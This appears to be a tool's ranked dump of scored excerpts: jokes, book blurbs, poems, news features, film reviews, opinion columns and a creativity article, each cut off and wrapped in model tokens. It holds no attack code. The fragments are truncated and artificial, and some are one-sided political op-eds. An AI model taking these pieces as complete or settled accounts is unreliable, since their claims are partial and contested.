type things up? Of course you can get written up if you’ve been a bad type at work. + +It was a tired, retired tire, attired entirely in tie-dyed Thai ties. + +Alternative spellings & meanings: + +Explain means to get off the plane, at least when it’s written explane. + +Refer is what my dog does right after he sheds, only it’s written refur. + +And finally: + +I was cooking strained peas the other day, but they got out of control and I had to restrain them. + +Thank you and good night; you’ve been a wonderful audience. + +— + +Click on this daisy for some more word fun:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 1089536.0 +<|begin_of_text|>This is a book on algorithms, some of them are probabilistic. But the book is a must have for students, job candidates even full time engineers & data scientists + +Good read. Overall Poker/Blackjack type card games are a good way to get introduced to probability theory + +Easily the most expensive book out there. So if the item above piques your interest and you want to go pro, go for it. + +Well written and easy to read mathematics. For the Poker beginner. + +An excellent resource (students/engineers/entrepreneurs) if you are looking for some code that you can take and implement directly on the job. + +Understanding Probability: Chance Rules in Everyday Life A bit pricy when compared to the first one, but I like the look and feel of the text used. It is simple to read and understand which is vital especially if you are trying to get into the subject + +Data Mining: Practical Machine Learning Tools and Techniques, Third Edition (The Morgan Kaufmann Series in Data Management Systems) This one is a must have if you want to learn machine learning. The book is beautifully written and ideal for the engineer/student who doesn't want to get too much into the details of a machine learned approach but wants a working knowledge of it. There are some great examples and test data in the text book too. + +This is a good book if you are new to statistics & probability while simultaneously getting started with a programming language. The book supports R and is written in a casual humorous way making it an easy read. Great for beginners. Some of the data on the companion website could be missing. + +Q: You have a coin that is biased to either heads or tails with probability \(p\) and you don't which way. How do you generate fair tosses using just this coin?A: There exists a fairly simple and elegant solution to this puzzle. Instead of using just the out come of the toss, use the outcomes of pairs of tosses that result in the patterns HT or TH. All other patterns should be ignored. The first instance of \(\{\ldots HT\ldots\}\) should be treated as a "heads" and if the first instance in series is \(\{\ldots TH\ldots\}\) then it should be treated as "tails". Here is why it works. Assume \(P(Heads) = p\) and \( P(Tails) = 1 - p\). The probability of getting a head followed by a tails is \(p\times(1-p)\). +================================================================================ +Rank = 21; Score = 1081344.0 +<|begin_of_text|>Photo: Media & Social Movements (Scott Olson) + +Dedicated to those who resist slavery: chattle, wage and prison + +On this day of slavery-this Fourth of July- + +Fredrick Douglass’ words challenge current lies. + +Today we aren’t slaves but we still aren’t free. + +Oppression still remains daily reality. + +Wage slaves are slaves-we pay for food and shacks. + +Frederick Douglass demanded “Freedom” from a system anti-Black + +And Fredrick Douglass’ words ring truer now. + +3 million locked up, Black and Brown then how… + +How is a country “the land of the free” + +with the most people in prison? Its fallacy!! + +The Civil War ended-slaves freed themselves-many. + +Now are shackled behind bars and paid mere pennies + +And jingoists yell, “If you don’t like it leave! + +Go somewhere else!!” but there is no reprieve. + +This country attacks all those who rebel. + +Obey Uncle Sam or he’ll bomb you to hell. + +The people are rising world round every day. + +Keep doing that here. I won’t go away. + +I will stay and fight your farce of July. + +Your phony jubilation – Rotten apple pies. + +Fight from inside the belly of the beast. + +Disrupt the party. Spoil the feast. + +The Government sings “It’s a home of the brave”!!! + +A home for capitalists-a trap for wage slaves. + +A home for bigots feeling safe in their system. + +A home for the bullies and those who defend them. + +For the oppressed and workers we are never at home. + +Attacked by police, spied on by drones + +Our wages are small, rent is too high. + +There is no independence on the Fourth of July. + +The brave have no home, no country or flag. + +So keep your red, white and blue, that imperialist rag. + +Celebrate the heroes who rebelled before us. + +Like Harriet Tubman and Frederick Douglass. + +Abandon the flag of stripes and stars + +the butchers apron- Confederate bars. + +For the international struggle workers have no borders. + +Take down the bosses, the pigs and the hoarders. + +This Fourth of July read Fredrick’s word. + +Freedom will be coming-act like ya heard. + +But it won’t be under the flag of might. + +Take the Amerikkkan flag and spark the fight.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 1073152.0 +<|begin_of_text|>Hundreds of young children in Afghanistan are being forced to share a jail cell with their mothers; women who in many cases are protesting their innocence or have been convicted of so-called moral crimes. + +Many of those children are facing years behind bars, cut off from the outside world yet themselves completely innocent of any offence. + +People & Power sent filmmakers Mike Healy and Najibullah Quraishi to find out why. + +FILMMAKER'S VIEW + +By Mike Healy + +The frequently appalling treatment of women in Afghanistan is a subject that has been well covered by the international media, and quite rightly so: Earlier this year for example, my British-Afghan colleague Najibullah Quraishi and I interviewed women who had been badly beaten and abused by their husbands and their families (including other women), and had no other option but to live secretly in a women's shelter in Kabul. + +One young woman had been stabbed in the head by her husband and had had her fingernails pulled out. When she tried to escape, she was imprisoned for four years by the authorities for the "moral crime" of simply being a woman unaccompanied by a male. + +We wanted to know what happened to the young children of such women (even the guilty ones), and Najibullah, using his extensive range of contacts in Afghanistan, secured us access to Jowzjan prison - sometimes referred to as Sheberghan prison, after the town where it's situated. + +A person in this 21st century needs to learn, experience and feel a lot of things in their first years of life so they are equipped to make the right choices and have a positive impact on society. In a prison environment... they miss out on those experiences. Afghan psychologist + +As far as we know, no-one has ever gained filming access to this subject before. The prison authorities took some persuading, and were conscious of how they would come across to an international audience, but the fact that this prison is widely seen as the best in northern Afghanistan meant that, relatively speaking, they had less to hide. + +Here the staff genuinely seemed to have personal connections with the female inmates, and living conditions – though clearly very basic – were relatively bearable. But we also heard reports of prisons in other areas where staff abuse and even rape the women under their guard. + +Once we got there, perhaps the biggest surprise was just how young the majority of the children were. But actually it made sense that the very youngest children including newborns in need of the greatest care remained with their mothers - +================================================================================ +Rank = 23; Score = 987136.0 +<|begin_of_text|>“I am not bound to win, but I am bound to be true. I am not bound to succeed, but I am bound to live up to what light I have. ” ~Abraham Lincoln + +As a child, my father always told me, “At everything you do, you have to be number one.” I tried. In some ways, I succeeded. I got high grades. Sometimes, the highest. Sometimes, I got awards. + +I became an expert at figuring out other people’s expectations and meeting them. This got me approval, but it never made me happy. I wasn’t passionate about grades, awards, or approval. I didn’t feel butterflies in my stomach while doing math. I didn’t feel shivers down my spine while conjugating French verbs. + +I loved to write, sing, dance. I was the girl who made up song lyrics and got them stuck in her head. I was the girl who stayed up after her parents went to bed to dance around, sing into my pillow, and crawl out onto the roof to dream about flying far, far away. I was that girl who couldn’t understand my thoughts until I wrote them down. + +Despite my parents’ wishes for me to pursue an academic, intellectual route, I went to theatre school. There, I thought I would explore the deepest crevices of my desires. I was wrong. + +I found the fine art education world to be shallow, and I found myself to be the same. My mind fixated on being the best. I never was. Disappointed with myself as much as the program, I dropped out. I slunk back to logic and facts. Skepticism. Analysis. Things I was good at. I got good grades. I got awards. + +But being good at something is never a replacement for loving it. I was addicted to academic achievement because it earned me approval. I could never get enough. Again, I got hungry for art. + +After I almost led myself into an early grave, I realized how important it was to make time for the things that made me feel alive. Yet on that journey, I’ve found myself constantly in the intermediate pile. Sometimes, beginner. Never, ever the best. + +I run all the time, but I’m not fast. I’ve been doing yoga for ten years, but I still can’t do Crow Pose. I’ve been playing acoustic guitar on and off for years, and I still struggle with barre chords. I’ve been singing since I was a kid, and my performances are inconsistent +================================================================================ +Rank = 24; Score = 970752.0 +<|begin_of_text|>Would you be alright, he asked me, in a dream. Would you be able to hold it together, he said, a question in his eyes. I lifted my shoulders, maybe shrugging, maybe tucking my head and my neck in my sweater for warmth, as I feel the cold start to seep into my bones. It doesn’t matter now, does it, is the only thing I could reply. It hardly ever matters now. + +Everyone Who Left Us + +Steven Cramer + +Everyone who left us we find everywhere. + +It’s easier now to look them in the eyes — + +At gravesites, in bed, when the phone rings. + +Of course, we wonder if they think of us. + +It’s easier, now, to look them in the eyes, + +Imagine touching a hand, listening to them talk. + +Of course, we wonder if they think of us + +When nights, like tonight, turn salty, warm. + +Imagine touching a hand, listening to them talk — + +Hard to believe they’re capable of such coldness. + +When nights, like tonight, turn salty, warm, + +We think of calling them, leaving messages. + +Hard to believe they’re capable of such coldness — + +No color, no pulse, not even a nerve reaction. + +We think of calling them, leaving messages + +Vivid with news we’re sure they’d want to know. + +No color, no pulse, not even a nerve reaction: + +We close our eyes in order not to see them. + +Vivid with news, we’re sure they’d want to know + +We don’t blame them, really. They weren’t cruel. + +We close our eyes in order not to see them + +Reading, making love, or falling asleep. + +We don’t blame them. Really, they weren’t cruel, + +Though it hurts every time we think of them: + +Reading, making love, or falling asleep, + +Enjoying the usual pleasures and boredoms. + +Though it hurts every time we think of them, + +Like a taste we can’t swallow, their names stay. + +Enjoying the usual pleasures and boredoms, + +Then, they leave us the look of their faces + +Like a taste we can’t swallow. Their names stay, + +Diminishing our own, getting in the way + +At gravesites, in bed, when the phone rings. + +Everyone who left us we find everywhere, + +Then they leave us, the look of their faces + +Diminishing, our own getting in the way.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 25; Score = 966656.0 +<|begin_of_text|>Lumbering around on his barky limbs, sprouting flowers and even dancing in a pot, one of the stars of the film "Guardians of the Galaxy" bizarrely blends the plant and animal kingdoms. "Groot," awalking, talking tree, seems to defy nature but how outlandish is the idea of a plant-animal hybrid? + +Plants that can smell and animals that regenerate show that animal and vegetable kingdoms may not be as far apart as they first appear. Some scientists even say Earth's biology suggests the possibility of "thinking plants" somewhere in the universe. + +Here, experts tell how Groot-like blending could occur, and some reasons it couldn't. [Science Fact or Fiction? The Plausibility of 10 Sci-Fi Concepts] + +Plant sight, plant hearing + +In the film, Groot clearly hears, sees, feels and talks (albeit, only three words, "I am Groot"). While one would be hard-pressed to find a talking vegetable on Earth, the idea of communicating and sensing plants is not at all outlandish, Danny Chamovitz, director of the Manna Center for Plant Biosciences at Tel Aviv University and author of "What a Plant Knows" (Scientific American, 2012), told Live Science. + +In fact, plants have a much richer, more dynamic life than most people give the leafy beings credit for, Chamovitz said. "We think of plants as un-living, because they're unmoving," Chamovitz said. "The strong scientific evidence is that plants have every sense familiar in animals, except hearing." + +They respond to chemicals, with lock-and-key mechanisms that resemble how animals smell. Plants have specific photoreceptors, which are proteins that respond to different wavelengths of light. They "know" when they're being touched, Simon Gilroy, a professor of botany at the University of Wisconsin-Madison, told Live Science. + +Plants also have proprioception, or a sense of their location in space, Chamovitz said, which is why they can tell when they're planted upside-down. + +Some plants can even "hear," able to distinguish the vibration patterns made by different chewing caterpillars, according to a study detailed this summer in the journal Oecologia, Gilroy said. (Decades-old claims that plants can "hear music," however, have little to no scientific support, he added.) + +This plant sensing may not seem evident after all, plants don't scream in pain or comment on Van +================================================================================ +Rank = 26; Score = 958464.0 +<|begin_of_text|>Show More + +It is easy to see how this arrogance comes. The genius is a genius by the first look he casts on any object. Is his eye creative? Does he not rest in angles and colors, but beholds the design?- he will presently undervalue the actual object. In powerful moments, his thought has dissolved the works of art and nature into their causes, so that the works appear heavy and faulty. He has a conception of beauty which the sculptor cannot embody. Picture, statue, temple, railroad, steam-engine, existed first in an artist's mind, without flaw, mistake, or friction, which impair the executed models. So did the Church, the State, college, court, social circle, and all the institutions. It is not strange that these men, remembering what they have seen and hoped of ideas, should affirm disdainfully the superiority of ideas. Having at some time seen that the happy soul will carry all the arts in power, they say, Why cumber ourselves with superfluous realizations? and like dreaming beggars they assume to speak and act as if these values were already substantiated. + +On the other part, the men of toil and trade and luxury,- the animal world, including the animal in the philosopher and poet also, and the practical world, including the painful drudgeries which are never excused to philosopher or poet any more than to the rest,- weigh heavily on the other side. The trade in our streets believes in no metaphysical causes, thinks nothing of the force which necessitated traders and a trading planet to exist: no, but sticks to cotton, sugar, wool and salt. The ward meetings, on election days, are not softened by any misgiving of the value of these ballotings. Hot life is streaming in a single direction. To the men of this world, to the animal strength and spirits, to the men of practical power, whilst immersed in it, the man of ideas appears out of his reason. They alone have reason. + +Things always bring their own philosophy with them, that is, prudence. No man acquires property without acquiring with it a little arithmetic also. In England, the richest country that ever existed, property stands for more, compared with personal ability, than in any other. After dinner, a man believes less, denies more: verities have lost some charm. After dinner, arithmetic is the only science: ideas are disturbing, incendiary, follies of young men, repudiated by the solid portion of society +================================================================================ +Rank = 27; Score = 905216.0 +<|begin_of_text|>In January 1999, the president of Tiger Electronics, Roger Shiffman, was forced to issue a statement clearing the name of the company’s hottest new toy. “Furby is not a spy,” he announced to the waiting world. + +Shiffman was speaking out after America’s National Security Agency (NSA) banned the toy from its premises. The ban was its response to a playground rumour that Furbies could be taught to speak, and therefore could record and repeat human speech. “The NSA did not do their homework,” said Shiffman at the time. + +But if America’s security agencies are still in the habit of banning toys that can record, spy, and store private information, then the list of contraband items must be getting exceptionally long. Nearly 18 years after TE were forced to deny Furby’s secret agent credentials, EU and US consumer watchdogs are filing complaints about a number of WiFi and Bluetooth connected interactive toys, also known as smart toys, which have hit the shelves. Equipped with microphones and an internet connection, many have the power to invade both children’s and adults’ private lives. + +*** + +“We wanted a smart toy that could learn and grow with a child,” says JP Benini, the co-founder of the CogniToys “Dino”, an interactive WiFi-enabled plastic dinosaur that can hold conversations with children and answer their questions. Benini and his team won the 2014 Watson Mobile Developer Challenge, allowing them to use the question-answering software IBM Watson to develop the Dino. As such, unlike the “interactive” toys of the Nineties and Noughties, Dino doesn’t simply reiterate a host of pre-recorded stock phrases, but has real, organic conversations. “We grew it from something that was like a Siri for kids to something that was more conversational in nature.” + +In order for this to work, Dino has a speaker in one nostril and a microphone in the other, and once a child presses the button on his belly, everything they say is processed by the internet-connected toy. The audio files are turned into statistical data and transcripts, which are then anonymised and encrypted. Most of this data is, in Benini’s words, “tossed out”, but his company, Elemental Path, which owns CogniToys, do store statistical data about a child, which they call “Play Data”. “We keep pieces from the interaction, not the full interaction itself,” he tells me. + +“ +================================================================================ +Rank = 28; Score = 905216.0 +<|begin_of_text|>This is always hard, being honest about a movie I’ve been looking forward to for so long and then being let down. Prometheus is another case where the hype out measures the film. When a film leaves a lot to be desired it can be frustrating, especially in the unique case of Prometheus. Before you continue reading, see Prometheus. It’s great, but be warned it is very flawed and the hype oversells it. As I say with almost every Ridley Scott film, I have a feeling there may be a directors cut on the way. + +Billed as a “quasi prequel” to Ridley Scott’s Alien, Prometheus starts as the journey to a large moon to explore a star system that has appeared in markings of ancient civilizations spanning thousands of years and vast distances. Egyptians, mayans, and even early settlers at the Isle of Skye have marked the same system of stars in their cave markings and carvings. A team, funded by the Weyland corporation and led by the excavators who discovered the markings, is sent out to find what some believe would be the origin of life on Earth and “meet our makers.” One of the crew, David, is an android and knows his makers well. If an android can register emotions than David has certainly learned to harbour resentment and disappointment. He is largely taken for granted as a machine, something meant to serve the conveniences of humans, his own makers. When the crew arrives on the moon and begins exploring, the things they find are horrific but not exactly explained in any way. + +That’s the major problem with Prometheus. There is a lot going on, and there is a lot of information for us to interpret, but a lot of questions are raised and a lot of character’s motivations are uncertain. The script is very confused to start with. With the story that Scott, Damon Lidelof and John Spaihts have chosen to tell, there were many scenes that were left lacking. Lindelof, still working in Lost mode, is more content to raise questions than deliver answers. This is good for a television show where there is more time to develop a world and make it mysterious, but in a film the payoff has to match the mysteries. Lindelof is relying on the Alien franchise to help answer some of those questions, but it doesn’t, because many of the things that Prometheus clears up, i.e. the motivation for the Weyland Corporation’s continued insistence of capturing the Xenomorph, aren’t as satisfying as he thinks they are because of +================================================================================ +Rank = 29; Score = 901120.0 +<|begin_of_text|>Machine Learning: An In-Depth Guide — Unsupervised Learning, Related Fields, and Machine Learning in Practice + +Alex Castrounis Blocked Unblock Follow Following Mar 18, 2016 + +Articles in This Series + +Introduction + +Welcome to the fifth and final chapter in a five-part series about machine learning. + +In this final chapter, we will revisit unsupervised learning in greater depth, briefly discuss other fields related to machine learning, and finish the series with some examples of real-world machine learning applications. + +Unsupervised Learning + +Recall that unsupervised learning involves learning from data, but without the goal of prediction. This is because the data is either not given with a target response variable (label), or one chooses not to designate a response. It can also be used as a pre-processing step for supervised learning. + +In the unsupervised case, the goal is to discover patterns, deep insights, understand variation, find unknown subgroups (amongst the variables or observations), and so on in the data. Unsupervised learning can be quite subjective compared to supervised learning. + +The two most commonly used techniques in unsupervised learning are principal component analysis (PCA) and clustering. PCA is one approach to learning what is called a latent variable model, and is a particular version of a blind signal separation technique. Other notable latent variable modeling approaches include expectation-maximization algorithm (EM) and Method of moments3. + +PCA + +PCA produces a low-dimensional representation of a dataset by finding a sequence of linear combinations of the variables that have maximal variance, and are mutually uncorrelated. Another way to describe PCA is that it is a transformation of possibly correlated variables into a set of linearly uncorrelated variables known as principal components. + +Each of the components are mathematically determined and ordered by the amount of variability or variance that each is able to explain from the data. Given that, the first principal component accounts for the largest amount of variance, the second principal component the next largest, and so on. + +Each component is also orthogonal to all others, which is just a fancy way of saying that they’re perpendicular to each other. Think of the X and Y axis’ in a two dimensional plot. Both axis are perpendicular to each other, and are therefore orthogonal. While not easy to visualize, think of having many principal components as being many axis that are perpendicular to each other. + +While much of the above description of principal component analysis may be a bit technical sounding, it is actually a relatively simple concept from a high level. Think of having a +================================================================================ +Rank = 30; Score = 876544.0 +<|begin_of_text|>This is how it starts: It's Thursday afternoon and I'm sitting on a sunny beach terrace nursing a glass of chilled wine when my phone shudders with a missile launched from the lilywhite land of Kildare. It's John. Twitter. He's not happy: "No comment from @PaulKimmage either about the Irish boxing positive, strange considering he targets other countries' athletes with glee." + +This is how it starts: It's Thursday afternoon and I'm sitting on a sunny beach terrace nursing a glass of chilled wine when my phone shudders with a missile launched from the lilywhite land of Kildare. It's John. Twitter. He's not happy: "No comment from @PaulKimmage either about the Irish boxing positive, strange considering he targets other countries' athletes with glee." + +My apologies, John, what would you like me to say? + +"I'm shocked." + +But I'm not shocked. + +"I'm angry." + +I'm not angry. + +"Michael O'Reilly has disgraced our country." + +That's not how I feel. + +You see, to be shocked or angry or indignant you have to care, John. And I don't care. I don't care for the Olympic Games. I don't care for the Olympic values. I don't care for the Olympic anthem. I don't care for the Olympic flame. I don't care for the Opening Ceremony, or the Closing Ceremony, or the medals table. + +I don't care. + +I keep hearing that I should care. I keep hearing that the Olympics still matter. I keep being told to accentuate the positive, not the negative, and that we've got great people there - Sinead and Claire and Sanita and Fionnuala and Pádraig and Paddy and Michael and Leona and Gary and Paul and Ciara, to name a few - and that if the Olympics matter to them, they should matter to us. + +That's fair. But you can't tell people what they should and should not feel. They either feel it or they don't. They either buy it or they don't. + +And I don't. + +I'm not buying Thomas Bach. I'm not buying Craig Reedie. I'm not buying Pat Hickey or Dick Pound or Seb Coe. I'd rather have Citius, Altius, Fortius tattooed to my wrinkled penis with a rusty nail than to have anything to do with the Lords of the Rings or their circus. That's why +================================================================================ +Rank = 31; Score = 856064.0 +<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. + +The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. + +It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. + +It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. + +Consider the following scenario (all times Benghazi local): + +When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command +================================================================================ +Rank = 32; Score = 856064.0 +<|begin_of_text|>This week a number of stories claiming the Tories had voted that animals are not sentient beings went mega-viral. An article on the Independent website – shared thousands of times on social media – reported “The Tories have rejected all scientists and voted that animals don’t feel pain”. The Evening Standard claimed they “just voted that animals cannot feel pain or emotions”. The Indy, which has truly become one of the most downmarket trash clickbait websites around, even named and shamed the Tory MPs “who voted legislation on animals feeling pain and emotion”. These attacks were tweeted out by celebrities like Ben Fogle and Sue Perkins, politicians including Caroline Lucas and failed LibDem MP Sarah Olney, and petitions were signed by hundreds of thousands of unwitting animal lovers. The stats are huge: + +Analysis shows 2 million people have seen articles and tweets about the Tories voting against animal sentience + +155,157 signed a Change.org petition repeating the claim + +263,476 signed another petition on 38 Degrees + +43,081 signed a third petition on ThePetitionSite + +Nearly 30,000 have signed smaller petitions (that’s almost 500,000 overall) + +Sue Perkins shared it with her 1 million followers + +Rachel Riley shared it with her 510,000 followers + +Ben Fogle shared it with his 336,000 followers + +Caroline Lucas shared it with her 276,000 followers + +The RSPCA tweeted it out to their 248,000 followers + +Just one problem. It is fake news… + +During last Wednesday’s debate, Tory MPs repeatedly explained that the government already recognised animal sentience and that the amendment was flawed. Read it here in Hansard – Tory MP after Tory MP stood up and agreed that animals are sentient. No MPs argued against animal sentience. It is just not true to say, as the Indy did, that “The Tories have rejected all scientists and voted that animals don’t feel pain”. Anyone who has seen the Environment Secretary with his Bichon Frise Snowy, or indeed the hedgehog above, knows these viral articles are fake news. This made up story, circulated by the Tories’ opponents for solely cynical reasons, is cutting through to animal lovers who think they can trust things they believe on the Independent website. This morning Michael Gove categorically committed the government to animal sentience once and for all. He couldn’t be clearer: + +“This government will ensure that any necessary changes required to UK law are made in a rigorous and comprehensive way to ensure animal sentience is recognised after we leave the +================================================================================ +Rank = 33; Score = 856064.0 +<|begin_of_text|>Setting Edit + +The series depicts a future in which Earth is dominated by artificial intelligence that was created early in the 21st century and rebelled against humanity. At one point, humans attempted to block out the machines' source of solar power by covering the sky in thick, stormy clouds. During this time, the machines and mankind were engaged in a massive war in which the machines ultimately emerged the victor. Having no definite source of energy, the machines devised a way to extract humans' bioelectricity and thermal energy by growing people in pods, while their minds are controlled by cybernetic implants connecting them to a simulated reality called the Matrix. The virtual reality world simulated by the Matrix resembles human civilization around the turn of the 21st century (this time period was chosen because it is supposedly the pinnacle of human civilization). The majority of the stories in the Matrix franchise take place in a vast Western World unnamed megacity. This environment is practically indistinguishable from reality (although scenes set within the Matrix are presented on-screen with a green tint to the footage, and a general bias towards the color green), and the majority of bluepills - humans connected to the Matrix - are unaware of its true nature. Most of the central characters in the series are able to gain superhuman abilities within the Matrix by taking advantage of their understanding of its true nature to manipulate its virtual physical laws. The virtual world is first introduced in The Matrix. The Animatrix short film "The Second Renaissance" and the short comic Bits and Pieces of Information show how the initial conflict between humans and machines came about, and how and why the Matrix was first developed. Its history and purpose are further explained in The Matrix Reloaded. + +Films Edit + +Cast Edit + +Crew Edit + +The Ultimate Matrix Collection Edit + +In 2004, Warner Home Video released The Ultimate Matrix Collection, a ten-disc set of the films on DVD. It included all three films, The Animatrix, and six discs of additional material, including the documentary film The Matrix Revisited, the live action footage shot for Enter the Matrix, and a promotional compilation of The Matrix Online. For this release, The Matrix was remastered under the supervision of the Wachowskis and Bill Pope to improve its picture quality and make its coloring closer to that of its sequels. At the request of the Wachowskis, as they explain in a written statement that accompanies the boxset, each of the three films is accompanied by two audio commentaries, one by philosophers who liked +================================================================================ +Rank = 34; Score = 851968.0 +<|begin_of_text|>This list has been expanded into the new book, "Wired to Create: Unravelling the Mysteries of the Creative Mind," by Carolyn Gregoire and Scott Barry Kaufman. + +Creativity works in mysterious and often paradoxical ways. Creative thinking is a stable, defining characteristic in some personalities, but it may also change based on situation and context. Inspiration and ideas often arise seemingly out of nowhere and then fail to show up when we most need them, and creative thinking requires complex cognition yet is completely distinct from the thinking process. + +Neuroscience paints a complicated picture of creativity. As scientists now understand it, creativity is far more complex than the right-left brain distinction would have us think (the theory being that left brain = rational and analytical, right brain = creative and emotional). In fact, creativity is thought to involve a number of cognitive processes, neural pathways and emotions, and we still don't have the full picture of how the imaginative mind works. + +And psychologically speaking, creative personality types are difficult to pin down, largely because they're complex, paradoxical and tend to avoid habit or routine. And it's not just a stereotype of the "tortured artist" -- artists really may be more complicated people. Research has suggested that creativity involves the coming together of a multitude of traits, behaviors and social influences in a single person. + +"It's actually hard for creative people to know themselves because the creative self is more complex than the non-creative self," Scott Barry Kaufman, a psychologist at New York University who has spent years researching creativity, told The Huffington Post. "The things that stand out the most are the paradoxes of the creative self... Imaginative people have messier minds." + +While there's no "typical" creative type, there are some tell-tale characteristics and behaviors of highly creative people. Here are 18 things they do differently. + +They daydream. + +Creative types know, despite what their third-grade teachers may have said, that 